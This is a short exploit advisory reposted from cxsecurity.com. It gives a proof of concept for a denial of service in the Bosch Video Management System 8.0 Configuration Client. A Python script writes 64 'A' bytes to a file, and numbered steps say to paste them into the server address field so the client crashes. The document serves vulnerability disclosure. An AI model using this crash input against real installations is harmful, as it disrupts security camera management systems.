Bosch Video Management System 8.0 Configuration Client Denial of Service

2018.11.15
Credit: Daniel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Bosch Video Management System 8.0 - Configuration Client - Denial of Service (PoC)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64

# Make sure that during the installation of the software you installed all the program features available.
# This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.

# Steps to produce the crash:
# 1.- Run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 3.- Click on 'Connection:' box and select "Address Book"
# 4.- Paste clipboard in "(Enterprise) Management Server Address:"
# 5.- Write "test" in 'Username'
# 6.- Write "test" in 'Password'
# 7.- Click on 'OK'
# 8.- Crash

#!/usr/bin/python

# 64 bytes of 'A' (0x41), the value pasted into the server address field
buf = "\x41" * 64

# Write the string to bosch.txt so it can be copied to the clipboard
with open('bosch.txt', 'w') as f:
    f.write(buf)



Copyright 2018, cxsecurity.com